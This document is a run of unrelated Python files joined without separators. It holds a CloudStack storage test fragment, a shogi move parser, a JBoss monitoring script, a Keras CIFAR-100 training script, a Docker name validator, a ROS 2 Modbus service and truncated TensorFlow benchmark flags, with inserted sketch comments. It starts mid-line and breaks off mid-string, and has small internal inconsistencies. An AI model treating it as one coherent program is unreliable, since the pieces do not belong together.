e)) cmd = "iostat | grep %s " % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) self.assertNotEqual(res, None, "Error getting iostat info") ret_data = ' '.join(map(str, res)).strip() return int(ret_data.split()[-1])
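# --- Illustrative sketch (not part of the test suite above) ---
# A standalone restatement of the Datera app-instance naming scheme that
# _get_app_instance_name_from_cs_volume documents: "CS-V-<name>-<uuid>" for
# volumes and "CS-T-<uuid>-<primary storage DB id>" for templates. The helper
# below is hypothetical and only shows the string layout; the tests above build
# the pieces from live CloudStack objects.

def build_app_instance_name(vol_type, uuid, name=None, primary_storage_db_id=None):
    prefix = 'CS'
    if vol_type == 'VOLUME':
        return '-'.join([prefix, 'V', name, uuid])
    if vol_type == 'TEMPLATE':
        return '-'.join([prefix, 'T', uuid, str(primary_storage_db_id)])
    raise ValueError('Unsupported vol_type: %s' % vol_type)

# build_app_instance_name('VOLUME', 'dfc41254-371a-40b3-b410-129eb79893c0',
#                         name='test-volume-7XWJ5Q')
# -> 'CS-V-test-volume-7XWJ5Q-dfc41254-371a-40b3-b410-129eb79893c0'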
import re from app.modules.shogi import Koma str2info = { "一": 0, "1": 0, "1": 0, "二": 1, "2": 1, "2": 1, "三": 2, "3": 2, "3": 2, "四": 3, "4": 3, "4": 3, "五": 4, "5": 4, "5": 4, "六": 5, "6": 5, "6": 5, "七": 6, "7": 6, "7": 6, "八": 7, "8": 7, "8": 7, "九": 8, "9": 8, "9": 8 } str2koma = { "歩": Koma.fu, "と": Koma.promoted_fu, "成歩": Koma.promoted_fu, "成と": Koma.promoted_fu, "香": Koma.kyosha, "香車": Koma.kyosha, "成香": Koma.promoted_kyosha, "成香車": Koma.promoted_kyosha, "桂": Koma.keima, "桂馬": Koma.keima, "成桂": Koma.promoted_keima, "成桂馬": Koma.promoted_keima, "銀": Koma.gin, "銀将": Koma.gin, "成銀": Koma.promoted_gin, "成銀将": Koma.promoted_gin, "金": Koma.kin, "金将": Koma.kin, "成金": Koma.kin, "成金将": Koma.kin, "角": Koma.kaku, "角行": Koma.kaku, "馬": Koma.promoted_kaku, "成角": Koma.promoted_kaku, "成角行": Koma.promoted_kaku, "成馬": Koma.promoted_kaku, "飛": Koma.hisha, "飛車": Koma.hisha, "龍": Koma.promoted_hisha, "成飛": Koma.promoted_hisha, "成飛車": Koma.promoted_hisha, "成龍": Koma.promoted_hisha, "王": Koma.gyoku, "玉": Koma.gyoku, "王将": Koma.gyoku, "玉将": Koma.gyoku, "成王": Koma.gyoku, "成玉": Koma.gyoku, "成王将": Koma.gyoku, "成玉将": Koma.gyoku } str2oppkoma = { "歩": Koma.opponent_fu, "と": Koma.opponent_promoted_fu, "成歩": Koma.opponent_promoted_fu, "成と": Koma.opponent_promoted_fu, "香": Koma.opponent_kyosha, "香車": Koma.opponent_kyosha, "成香": Koma.opponent_promoted_kyosha, "成香車": Koma.opponent_promoted_kyosha, "桂": Koma.opponent_keima, "桂馬": Koma.opponent_keima, "成桂": Koma.opponent_promoted_keima, "成桂馬": Koma.opponent_promoted_keima, "銀": Koma.opponent_gin, "銀将": Koma.opponent_gin, "成銀": Koma.opponent_promoted_gin, "成銀将": Koma.opponent_promoted_gin, "金": Koma.opponent_kin, "金将": Koma.opponent_kin, "成金": Koma.opponent_kin, "成金将": Koma.opponent_kin, "角": Koma.opponent_kaku, "角行": Koma.opponent_kaku, "馬": Koma.opponent_promoted_kaku, "成角": Koma.opponent_promoted_kaku, "成角行": Koma.opponent_promoted_kaku, "成馬": Koma.opponent_promoted_kaku, "飛": Koma.opponent_hisha, "飛車": Koma.opponent_hisha, "龍": Koma.opponent_promoted_hisha, "成飛": Koma.opponent_promoted_hisha, "成飛車": Koma.opponent_promoted_hisha, "成龍": Koma.opponent_promoted_hisha, "王": Koma.opponent_gyoku, "玉": Koma.opponent_gyoku, "王将": Koma.opponent_gyoku, "玉将": Koma.opponent_gyoku, "成王": Koma.opponent_gyoku, "成玉": Koma.opponent_gyoku, "成王将": Koma.opponent_gyoku, "成玉将": Koma.opponent_gyoku } koma_names = [ "歩", "と", "香", "香車", "桂", "桂馬", "銀", "銀将", "金", "金将", "角", "角行", "馬", "飛", "飛車", "龍", "王", "玉", "王将", "玉将" ] koma_names += list(map(lambda n: "成" + n, koma_names)) def transposition_num(num): """ transposition axis(y) number. 0 => 8, 1 => 7, ..., 8 => 0 """ return (4 - num) + 4 class ParseInput: @staticmethod def parse(input_str, shogi): """ parse input text and get (from, to) Coordinate. 
""" is_first_turn = shogi.first def get_koma(): # input_str is only koma name if input_str in koma_names: if is_first_turn: koma = str2koma[input_str] else: koma = str2oppkoma[input_str] return koma return False # promote promote = False if input_str[-1] == ("成"): if input_str.find("打") != -1: return False if input_str[-2] == ("不"): input_str = input_str.replace("不成", "") else: # TODO : Detect to be able to promote promote = True input_str = input_str.replace("成", "") # same if input_str.find("同") != -1: idx = input_str.find("同") + 1 input_str = input_str[idx:] to_x = shogi.last_move_x to_y = shogi.last_move_y # get to_x, to_y from text else: if input_str[0] in str2info and input_str[0] in str2info: to_x = transposition_num(str2info[input_str[0]]) to_y = str2info[input_str[1]] else: # TODO : Send Error Message return False input_str = input_str[2:] # remove number of axis # setting from flag from_flag = 0 if input_str.find("上") != -1: from_flag = 1 input_str = input_str.replace("上", "") if input_str.find("右") != -1: from_flag += 2 input_str = input_str.replace("右", "") # 3 => 右上 if input_str.find("引") != -1: from_flag += 4 input_str = input_str.replace("引", "") # 5 => None # 6 => 右引 # 7 => None if input_str.find("左") != -1: from_flag += 8 input_str = input_str.replace("左", "") # 9 => 左上 # 10,11 => None # 12 => 左引 # 13~15 => None if input_str.find("寄") != -1: from_flag = 16 input_str = input_str.replace("寄", "") if input_str.find("直") != -1: from_flag = 17 input_str = input_str.replace("直", "") # drop if input_str.find("打") != -1: from_x = -1 from_y = -1 input_str = input_str.replace("打", "") koma = get_koma() if shogi.droppable(koma, to_x, to_y): return (from_x, from_y, to_x, to_y, promote, koma) else: return False # if in this block, input_str is only koma name koma = get_koma() if not koma: return False candidate_komas = shogi.find_koma(koma) movable_komas = [] for candidate_koma in candidate_komas: if shogi.movable(candidate_koma[0], candidate_koma[1], to_x, to_y, promote): movable_komas.append(candidate_koma) if len(movable_komas) == 0: # TODO : Send Error Message return False elif len(movable_komas) == 1: from_x = movable_komas[0][0] from_y = movable_komas[0][1] else: turn = is_first_turn # for pep # "上" if from_flag == 1: for t in movable_komas: # t => "t"arget if (turn and t[1] > to_y) or \ (not turn and t[1] < to_y): from_x, from_y = t from_flag = 0 break # "右" elif from_flag == 2: for t in movable_komas: if (turn and t[0] > to_x) or \ (not turn and t[0] < to_x): from_x, from_y = t from_flag = 0 break # "右上" elif from_flag == 3: for t in movable_komas: if (turn and t[0] > to_x and t[1] > to_y) or \ (not turn and t[0] < to_x and t[1] < to_y): from_x, from_y = t from_flag = 0 break # "引" elif from_flag == 4: for t in movable_komas: if (turn and t[1] < to_y) or \ (not turn and t[1] > to_y): from_x, from_y = t from_flag = 0 break # "右引" elif from_flag == 6: for t in movable_komas: if (turn and t[0] > to_x and t[1] < to_y) or \ (not turn and t[0] < to_x and t[1] > to_y): from_x, from_y = t from_flag = 0 break # "左" elif from_flag == 8: for t in movable_komas: if (turn and t[0] < to_x) or \ (not turn and t[0] > to_x): from_x, from_y = t from_flag = 0 break # "左上" elif from_flag == 9: for t in movable_komas: if (turn and t[0] < to_x and t[1] > to_y) or \ (not turn and t[0] > to_x and t[1] < to_y): from_x, from_y = t from_flag = 0 break # "左引" elif from_flag == 12: for t in movable_komas: if (turn and t[0] < to_x and t[1] < to_y) or \ (not turn and t[0] > to_x and t[1] > to_y): from_x, 
from_y = t from_flag = 0 break # "寄" elif from_flag == 16: for t in movable_komas: if (t[1] == to_y): from_x, from_y = t from_flag = 0 break # "直" elif from_flag == 17: for t in movable_komas: if (t[0] == to_x and ((turn and t[1] > to_y) or (not turn and t[1] < to_y))): from_x, from_y = t from_flag = 0 break # TODO : Send Error Message if from_flag != 0: return False return (from_x, from_y, to_x, to_y, promote, koma)
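# --- Illustrative sketch (separate from ParseInput above) ---
# The parser above folds the Japanese disambiguation suffixes into a single
# integer "from_flag": 上 contributes 1, 右 contributes 2, 引 contributes 4 and
# 左 contributes 8 (so 3 means 右上 and 12 means 左引), while 寄 and 直
# overwrite the flag with 16 and 17. The helper below is a hypothetical,
# stripped-down restatement of that encoding for a suffix string that has
# already had the destination square and piece name removed; it is not used by
# ParseInput.parse itself.

def encode_from_flag(suffix):
    flag = 0
    if "上" in suffix:
        flag += 1
    if "右" in suffix:
        flag += 2
    if "引" in suffix:
        flag += 4
    if "左" in suffix:
        flag += 8
    if "寄" in suffix:
        flag = 16
    if "直" in suffix:
        flag = 17
    return flag

# encode_from_flag("右上") == 3, encode_from_flag("左引") == 12,
# encode_from_flag("寄") == 16 -- mirroring the branches handled above.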
#!/usr/bin/python
"""jboss.* scripts item

Copyright (c) 2011 Vladimir Rusinov <vladimir@greenmice.info>
Copyright (c) 2001 Wrike, Inc. [http://www.wrike.com]
License: GNU GPL3
This file is part of ZTC [http://bitbucket.org/ztc/ztc/]

Example usage:
    ./jboss.py get_prop jboss.system:type=ServerInfo FreeMemory
"""

from ztc.java.jboss import JMXJboss

j = JMXJboss()
m = j.args[0]
j.get(m, *j.args[1:])
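# --- Illustrative sketch ---
# The ZTC check above takes the metric name as the first CLI argument and
# forwards the remaining arguments to JMXJboss.get(). Since the ZTC internals
# are not shown here, the snippet below only mirrors that argument-splitting
# pattern with plain sys.argv; echo_metric is a hypothetical stand-in, not part
# of ZTC.

import sys


def echo_metric(metric, *extra):
    """Stand-in for JMXJboss.get(): just report what would be queried."""
    print("metric=%s args=%s" % (metric, list(extra)))


if __name__ == '__main__':
    # e.g. python this_sketch.py get_prop jboss.system:type=ServerInfo FreeMemory
    argv = sys.argv[1:]
    if argv:
        echo_metric(argv[0], *argv[1:])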
""" Adapted from keras example cifar10_cnn.py Train ResNet-18 on the CIFAR10 small images dataset. GPU run command with Theano backend (with TensorFlow, the GPU is automatically used): THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10.py """ from __future__ import print_function from keras.datasets import cifar100 from keras.preprocessing.image import ImageDataGenerator from keras.utils import np_utils from keras.callbacks import ReduceLROnPlateau, CSVLogger, EarlyStopping from keras.callbacks import TensorBoard import os import tensorflow as tf import argparse import numpy as np import vgg7 import resnet #args parse = argparse.ArgumentParser() parse.add_argument("--layer_nums",help="the num of layers in each branch",default=18,type=int) parse.add_argument("--input_layers",help="the num of layers in each branch",nargs=4,default=[2,2,2,2],type=int) parse.add_argument("--backbone",help="backbone of the network",default="vgg7",type=str) parse.add_argument("--logPath",help="the path for log ",default="./logs/lalala/",type=str) parse.add_argument("--only_last",help="nouse merge use only last branch ",default=-1,type=int) args = parse.parse_args() lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1), cooldown=0, patience=5, min_lr=0.5e-6) early_stopper = EarlyStopping(min_delta=0.00000000001, patience=100) csv_logger = CSVLogger('vgg7_modify_cifar100.csv') batch_size = 32 nb_classes = 100 nb_epoch = 400 data_augmentation = True # input image dimensions img_rows, img_cols = 32, 32 # The CIFAR100 images are RGB. img_channels = 3 # The data, shuffled and split between train and test sets: (X_train, y_train), (X_test, y_test) = cifar100.load_data(label_mode='fine') # Convert class vectors to binary class matrices. Y_train = np_utils.to_categorical(y_train, nb_classes) Y_test = np_utils.to_categorical(y_test, nb_classes) X_train = X_train.astype('float32') X_test = X_test.astype('float32') # subtract mean and normalize mean_image = np.mean(X_train, axis=0) X_train -= mean_image X_test -= mean_image X_train /= 128. X_test /= 128. 
#create model if(args.layer_nums==18): model = vgg7.vggBuilder.build_three_branch_18((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==34): model = vgg7.vggBuilder.build_three_branch_32((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==50): model = vgg7.vggBuilder.build_three_branch_50((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==101): model = vgg7.vggBuilder.build_three_branch_101((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==152): model = vgg7.vggBuilder.build_three_branch_152((img_channels, img_rows, img_cols), nb_classes) if(args.only_last==0): model = vgg7.vggBuilder.build_three_branch_18_only_last((img_channels, img_rows, img_cols), nb_classes,args.only_last) elif(args.only_last==1): model = vgg7.vggBuilder.build_three_branch_18_only_last_model1((img_channels, img_rows, img_cols), nb_classes,args.only_last) elif(args.only_last==2): model = vgg7.vggBuilder.build_three_branch_18_only_last_model2((img_channels, img_rows, img_cols), nb_classes,args.only_last) if(args.input_layers!=None): model = vgg7.vggBuilder.build_three_branch_input((img_channels, img_rows, img_cols), nb_classes,args.input_layers) if(args.backbone=="vgg7"): model = vgg7.vggBuilder.vgg7((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggA"): model = vgg7.vggBuilder.vggA((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggB"): model = vgg7.vggBuilder.vggB((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggC"): model = vgg7.vggBuilder.vggC((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggD"): model = vgg7.vggBuilder.vggD((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="resnet18"): model = resnet.ResnetBuilder.build_resnet_18_old((img_channels, img_rows, img_cols), nb_classes) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) logPath = args.logPath if(not os.path.exists(logPath)): os.makedirs(logPath) if not data_augmentation: print('Not using data augmentation.') model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, validation_data=(X_test, Y_test), shuffle=True, callbacks=[lr_reducer, early_stopper, csv_logger,TensorBoard(log_dir=logPath)]) else: print('Using real-time data augmentation.') # This will do preprocessing and realtime data augmentation: datagen = ImageDataGenerator( featurewise_center=False, # set input mean to 0 over the dataset samplewise_center=False, # set each sample mean to 0 featurewise_std_normalization=False, # divide inputs by std of the dataset samplewise_std_normalization=False, # divide each input by its std zca_whitening=False, # apply ZCA whitening rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180) width_shift_range=0.1, # randomly shift images horizontally (fraction of total width) height_shift_range=0.1, # randomly shift images vertically (fraction of total height) horizontal_flip=True, # randomly flip images vertical_flip=False) # randomly flip images # Compute quantities required for featurewise normalization # (std, mean, and principal components if ZCA whitening is applied). datagen.fit(X_train) # Fit the model on the batches generated by datagen.flow(). 
    model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size),
                        steps_per_epoch=X_train.shape[0] // batch_size,
                        validation_data=(X_test, Y_test),
                        epochs=nb_epoch,
                        verbose=1,
                        max_q_size=100,
                        callbacks=[TensorBoard(log_dir=logPath),
                                   lr_reducer, early_stopper, csv_logger])
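# --- Illustrative sketch ---
# A minimal, self-contained restatement of the input normalisation used in the
# training script above: subtract the per-pixel mean of the training set from
# both splits, then divide by 128. Random arrays stand in for CIFAR-100 so the
# snippet runs without downloading the dataset.

import numpy as np


def normalise_like_above(x_train, x_test):
    x_train = x_train.astype('float32')
    x_test = x_test.astype('float32')
    mean_image = np.mean(x_train, axis=0)   # per-pixel, per-channel mean
    x_train = (x_train - mean_image) / 128.
    x_test = (x_test - mean_image) / 128.
    return x_train, x_test


if __name__ == '__main__':
    fake_train = np.random.randint(0, 256, size=(8, 32, 32, 3))
    fake_test = np.random.randint(0, 256, size=(4, 32, 32, 3))
    tr, te = normalise_like_above(fake_train, fake_test)
    print(tr.shape, te.shape, float(tr.mean()))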
# @Author: Joey Teng # @Email: joey.teng.dev@gmail.com # @Filename: plot_datasets.py # @Last modified by: Joey Teng # @Last modified time: 31-Jul-2018 import argparse import collections import os import plotly import download_png class PlotGraph(object): @classmethod def __call__(cls, *args, **kwargs): return cls.run(*args, **kwargs) @classmethod def run(cls, path, _data): print("Plotting graph of: {}".format(path), flush=True) data = cls.plot_data_generation(_data) cls.plot( path, data) print("Graph Plotted: {}".format(path), flush=True) @classmethod def title_generation(cls, title, **kwargs): return "{}{}".format( title, "".join( ["<br>{}: {}".format(key, value) for key, value in kwargs.items()])) @classmethod def plot_data_generation(cls, _data): return [ plotly.graph_objs.Scatter( x=_data[0]['x'], y=_data[0]['y'], mode='markers', marker=dict( symbol='circle' ), name='category 0' ), plotly.graph_objs.Scatter( x=_data[1]['x'], y=_data[1]['y'], mode='markers', marker=dict( symbol='x' ), name='category 1' ) ] @classmethod def plot_offline(cls, fig, path): filename = "{}.html".format(path[:-len('.png')]) url = plotly.offline.plot( fig, image="png", image_filename=path[path.rfind('/') + 1:-len('.png')], filename=filename, auto_open=False) destination = path[:path.rfind('/')] try: download_png.download(destination, url) except RuntimeError: print("RuntimeError occurs when downloading {}".format(url), flush=True) return print("Offline Graph Plotted: {}".format(path), flush=True) @classmethod def plot(cls, path, data): fig = plotly.graph_objs.Figure(data=data) cls.plot_offline(fig, path) def load(args): path = args.i with open(path, 'r') as reader: labeled_points = reader.readlines() labeled_points = list(map( lambda row: tuple( (lambda cell: (float(cell[0]), float(cell[1]), int(cell[2]))) (row.split(','))), labeled_points)) return labeled_points def plot(points, args): path = args.save_image_to if (not path.startswith('/')): # Using relative path instead of absolute path = '{}/{}'.format(os.getcwd(), path) data = [collections.defaultdict(list), collections.defaultdict(list)] for point in points: data[point[2]]['x'].append(point[0]) data[point[2]]['y'].append(point[1]) PlotGraph()(path, data) def parse_args(): parser = argparse.ArgumentParser( description="Plot graphs for 2-D Binary Datasets" ) parser.add_argument('-i', action='store', type=str, default='data.in', help='Path to where the generated dataset is stored') parser.add_argument('--save_image_to', action='store', type=str, default="{}/data.png".format(os.getcwd()), help='Path to where the graph plotted is stored') return parser.parse_args() if __name__ == '__main__': args = parse_args() points = load(args) if points: plot(points, args)
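# --- Illustrative sketch ---
# load() above expects one "x,y,label" triple per line of the input file. The
# snippet below applies the same parsing to an in-memory list of rows, so the
# expected input format is visible without creating data.in; parse_rows is a
# hypothetical helper and is not used by the script above.

def parse_rows(rows):
    return [
        (float(x), float(y), int(label))
        for x, y, label in (row.strip().split(',') for row in rows if row.strip())
    ]

# parse_rows(["0.5,1.5,0", "2.0,3.0,1"]) == [(0.5, 1.5, 0), (2.0, 3.0, 1)],
# i.e. the same shape of labeled point that plot() groups by label.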
"""This package defines Tag a way of representing an image uri.""" class BadNameException(Exception): """Exceptions when a bad docker name is supplied.""" _REPOSITORY_CHARS = 'abcdefghijklmnopqrstuvwxyz0123456789_-./' _TAG_CHARS = 'abcdefghijklmnopqrstuvwxyz0123456789_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ' # These have the form: sha256:<hex string> _DIGEST_CHARS = 'sh:0123456789abcdef' def _check_element(name, element, characters, min_len, max_len): """Checks a given named element matches character and length restrictions. Args: name: str, the name of the element being validated element: str, the actual element being checked characters: str, acceptable characters for this element, or None min_len: int, minimum element length, or None max_len: int, maximum element length, or None Raises: BadNameException: one of the restrictions was not met. """ length = len(element) if min_len and length < min_len: raise BadNameException('Invalid %s: %s, must be at least %s characters' % (name, element, min_len)) if max_len and length > max_len: raise BadNameException('Invalid %s: %s, must be at most %s characters' % (name, element, max_len)) if element.strip(characters): raise BadNameException('Invalid %s: %s, acceptable characters include: %s' % (name, element, characters)) def _check_repository(repository): _check_element('repository', repository, _REPOSITORY_CHARS, 4, 255) def _check_tag(tag): _check_element('tag', tag, _TAG_CHARS, 1, 127) def _check_digest(digest): _check_element('digest', digest, _DIGEST_CHARS, 7 + 64, 7 + 64) class Repository(object): """Stores a docker repository name in a structured form.""" def __init__(self, name): if not name: raise BadNameException('A Docker image name must be specified') parts = name.split('/', 1) if len(parts) != 2: raise self._validation_exception(name) self._registry = parts[0] self._repository = parts[1] _check_repository(self._repository) def _validation_exception(self, name): return BadNameException('Docker image name must have the form: ' 'registry/repository, saw: %s' % name) @property def registry(self): return self._registry @property def repository(self): return self._repository def __str__(self): return '{registry}/{repository}'.format( registry=self.registry, repository=self.repository) class Tag(Repository): """Stores a docker repository tag in a structured form.""" def __init__(self, name): parts = name.split(':') if len(parts) != 2: raise self._validation_exception(name) self._tag = parts[1] _check_tag(self._tag) super(Tag, self).__init__(parts[0]) def _validation_exception(self, name): return BadNameException('Docker image name must be fully qualified (e.g.' 'registry/repository:tag) saw: %s' % name) @property def tag(self): return self._tag def __str__(self): return '{base}:{tag}'.format(base=super(Tag, self).__str__(), tag=self.tag) class Digest(Repository): """Stores a docker repository digest in a structured form.""" def __init__(self, name): parts = name.split('@') if len(parts) != 2: raise self._validation_exception(name) self._digest = parts[1] _check_digest(self._digest) super(Digest, self).__init__(parts[0]) def _validation_exception(self, name): return BadNameException('Docker image name must be fully qualified (e.g.' 'registry/repository@digest) saw: %s' % name) @property def digest(self): return self._digest def __str__(self): return '{base}@{digest}'.format(base=super(Digest, self).__str__(), digest=self.digest)
import sys

import rclpy
from rclpy.node import Node
from ament_index_python.packages import get_package_share_directory

# Make the bundled pp_library package importable; the share-directory path
# computed here is otherwise never used before the import below.
pp_share = get_package_share_directory('pickplace')
pp_library = pp_share + '/pickplace/pp_library'
sys.path.append(pp_library)

from pp_library import Modbus
from pickplace_msgs.srv import AskModbus


class ModbusService(Node):
    """ROS 2 service node that proxies Modbus queries for the pickplace stack."""

    def __init__(self):
        super().__init__('modbus_service')
        self.modbus = Modbus.ModbusClass()
        self.srv = self.create_service(AskModbus, 'ask_modbus', self.ask_modbus_callback)

    def ask_modbus_callback(self, request, response):
        # Position queries fill response.position; the IO requests only have
        # side effects and leave the response at its default value.
        if request.req == 'get_base':
            response.position = self.modbus.get_base()
        elif request.req == 'get_pos':
            response.position = self.modbus.get_pos()
        elif request.req == 'init_io':
            self.modbus.init_io()
        elif request.req == 'open_io':
            self.modbus.open_io()
        elif request.req == 'close_io':
            self.modbus.close_io()
        return response


def main(args=None):
    rclpy.init(args=args)
    modbus_service = ModbusService()
    rclpy.spin(modbus_service)
    rclpy.shutdown()


if __name__ == '__main__':
    main()
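# --- Illustrative client sketch (not part of the service file above) ---
# A minimal rclpy client for the 'ask_modbus' service defined above. It assumes
# the ModbusService node is already running and relies only on the AskModbus
# fields visible in the callback ('req' in the request, 'position' in the
# response). The function and node names below are hypothetical.

import rclpy
from rclpy.node import Node
from pickplace_msgs.srv import AskModbus


def ask_modbus_once(what='get_pos', timeout_sec=5.0):
    """Send a single request to 'ask_modbus' and return the response, or None."""
    rclpy.init()
    node = Node('modbus_client_example')
    client = node.create_client(AskModbus, 'ask_modbus')
    response = None
    if client.wait_for_service(timeout_sec=timeout_sec):
        request = AskModbus.Request()
        request.req = what
        future = client.call_async(request)
        rclpy.spin_until_future_complete(node, future)
        response = future.result()
    else:
        node.get_logger().error('ask_modbus service not available')
    node.destroy_node()
    rclpy.shutdown()
    return response

# Example: result = ask_modbus_once('get_pos'); print(result.position)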
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """TensorFlow benchmark library. See the README for more information. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import argparse from collections import namedtuple import contextlib import datetime import math import multiprocessing import os import re import threading import time import traceback from absl import flags as absl_flags import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin import tensorflow as tf import cnn_util import constants import datasets import flags import mlperf import variable_mgr import variable_mgr_util from cnn_util import log_fn from models import model_config from platforms import util as platforms_util from google.protobuf import text_format from tensorflow.contrib.compiler import xla from tensorflow.core.protobuf import rewriter_config_pb2 from tensorflow.python import debug as tf_debug from tensorflow.python.client import timeline from tensorflow.python.data.experimental.ops import prefetching_ops from tensorflow.python.framework import graph_util from tensorflow.python.framework import graph_util_impl from tensorflow.python.framework import importer from tensorflow.python.ops import data_flow_ops from tensorflow.python.platform import gfile from tensorflow.python.util import nest _DEFAULT_NUM_BATCHES = 100 # GraphInfo encapsulates the tensors/ops that we care about after building a # graph. We use them to benchmark the graph. GraphInfo = namedtuple( # pylint: disable=invalid-name 'GraphInfo', [ # Ops that produce the input batches (before preprocessing). 'input_producer_op', # Ops that adds the preprocessed images to the staging areas 'enqueue_ops', # Fetches of sess.run() 'fetches', # Op that performs synchronization in distributed mode 'execution_barrier', # The global step variable 'global_step', # Group of ops that perform per-device initialization work 'local_var_init_op_group', # Op to produce summaries 'summary_op' ]) # InputProcessingInfo contains various sources of inputs which will be later fed # into the model. If synthetic data is used, all four fields are None. InputProcessingInfo = namedtuple( 'InputProcessingInfo', [ # The first two fields are non-None iff datasets prefetching is not # used. # Ops that produce the input batches. 'input_producer_op', # A list of StagingArea for each device. 'input_producer_stages', # Input produced using FunctionBufferingResource. Non-None iff datasets # prefetching is used and --use_multi_device_iterator=False 'function_buffering_resources', # Input produced using multi device iterator. 
Non-None iff datasets # prefetching is used and --use_multi_device_iterator=True 'multi_device_iterator_input' ]) # TODO(reedwm): add upper_bound and lower_bound to appropriate integer and # float flags, and change certain string flags to enum flags. flags.DEFINE_string('model', 'trivial', 'Name of the model to run, the list of supported models ' 'are defined in models/model.py') # The code will first check if it's running under benchmarking mode # or evaluation mode, depending on 'eval': # Under the evaluation mode, this script will read a saved model, # and compute the accuracy of the model against a validation dataset. # Additional ops for accuracy and top_k predictors are only used under # this mode. # Under the benchmarking mode, user can specify whether nor not to use # the forward-only option, which will only compute the loss function. # forward-only cannot be enabled with eval at the same time. flags.DEFINE_boolean('eval', False, 'whether use eval or benchmarking') flags.DEFINE_integer('eval_interval_secs', 0, 'How often to run eval on saved checkpoints. Usually the ' 'same as save_model_secs from the corresponding training ' 'run. Pass 0 to eval only once.') flags.DEFINE_integer('eval_during_training_every_n_steps', None, 'Every n steps during training, pause training, run ' 'evaluation, then resume training. Must not be used with ' '--eval, as unlike --eval, this option causes both ' 'training and eval to be done. This may take slightly ' 'more GPU memory than running just training or evaluation ' 'alone. It also may slightly slow down training, even ' 'when not taking into account the additional time to ' 'evaluate.', lower_bound=1) flags.DEFINE_float('eval_during_training_every_n_epochs', None, 'After every n training epochs, pause training, run ' 'evaluation, then resume training. See ' '--eval_during_training_every_n_steps for more information.') flags.DEFINE_list('eval_during_training_at_specified_steps', [], 'Specify a list of training steps, pause training at each of ' 'these steps, run evaluation, then resume training. See ' '--eval_during_training_every_n_steps for more information.') flags.DEFINE_list('eval_during_training_at_specified_epochs', [], 'Specify a list of training epochs, pause training after ' 'each of these epochs, run evaluation, then resume training. ' 'See --eval_during_training_every_n_steps for more ' 'information.') flags.DEFINE_boolean('forward_only', False, 'whether use forward-only or training for benchmarking') flags.DEFINE_boolean('freeze_when_forward_only', False, 'whether to freeze the graph when in forward-only mode.') flags.DEFINE_boolean('print_training_accuracy', False, 'whether to calculate and print training accuracy during ' 'training') flags.DEFINE_integer('batch_size', 0, 'batch size per compute device') flags.DEFINE_integer('eval_batch_size', 0, 'eval batch size per compute device') flags.DEFINE_integer('batch_group_size', 1, 'number of groups of batches processed in the image ' 'producer.') flags.DEFINE_integer('num_batches', None, 'number of batches to run, excluding ' 'warmup. Defaults to %d' % _DEFAULT_NUM_BATCHES) flags.DEFINE_integer('num_eval_batches', None, 'number of eval batches to run, excluding warmup. ' 'Defaults to --num_batches') flags.DEFINE_float('num_epochs', None, 'number of epochs to run, excluding warmup. ' 'This and --num_batches cannot both be specified.') flags.DEFINE_float('num_eval_epochs', None, 'number of eval epochs to run, excluding warmup. 
' 'Defaults to --num_epochs') flags.DEFINE_float('stop_at_top_1_accuracy', None, 'If set, stops training after the evaluation accuracy hits ' 'this number. Can only be used with one of the ' '--eval_during_training_* flags.') flags.DEFINE_boolean('collect_eval_results_async', False, 'If True, start a separate process to postprocess eval ' 'results asynchronously. This currently only works with ' 'the SSD model.') flags.DEFINE_integer('num_warmup_batches', None, 'number of batches to run before timing') flags.DEFINE_integer('autotune_threshold', None, 'The autotune threshold for the models') flags.DEFINE_integer('num_gpus', 1, 'the number of GPUs to run on') flags.DEFINE_string('gpu_indices', '', 'indices of worker GPUs in ring order') flags.DEFINE_integer('display_every', 10, 'Number of local steps after which progress is printed ' 'out') flags.DEFINE_float('display_perf_ewma', None, 'If set, display numbers of images/sec using exponentially ' 'weighted moving avearge with the specified weight, which ' 'defines how much current value contributes to the reported ' 'average. Increasing weight makes the reported performance ' 'number reflect more about the real-time speed instead of ' 'the entire history', lower_bound=0, upper_bound=1) flags.DEFINE_string('data_dir', None, 'Path to dataset in TFRecord format (aka Example ' 'protobufs). If not specified, synthetic data will be ' 'used.') flags.DEFINE_string('data_name', None, 'Name of dataset: imagenet or cifar10. If not specified, ' 'it is automatically guessed based on data_dir.') flags.DEFINE_string('resize_method', 'bilinear', 'Method for resizing input images: crop, nearest, ' 'bilinear, bicubic, area, or round_robin. The `crop` mode ' 'requires source images to be at least as large as the ' 'network input size. The `round_robin` mode applies ' 'different resize methods based on position in a batch in ' 'a round-robin fashion. Other modes support any sizes and ' 'apply random bbox distortions before resizing (even with ' 'distortions=False).') flags.DEFINE_boolean('distortions', True, 'Enable/disable distortions during image preprocessing. ' 'These include bbox and color distortions.') flags.DEFINE_boolean('use_datasets', True, 'Enable use of datasets for input pipeline') flags.DEFINE_string('input_preprocessor', 'default', 'Name of input preprocessor. The list of supported input ' 'preprocessors are defined in preprocessing.py.') flags.DEFINE_string('gpu_thread_mode', 'gpu_private', 'Methods to assign GPU host work to threads. ' 'global: all GPUs and CPUs share the same global threads; ' 'gpu_private: a private threadpool for each GPU; ' 'gpu_shared: all 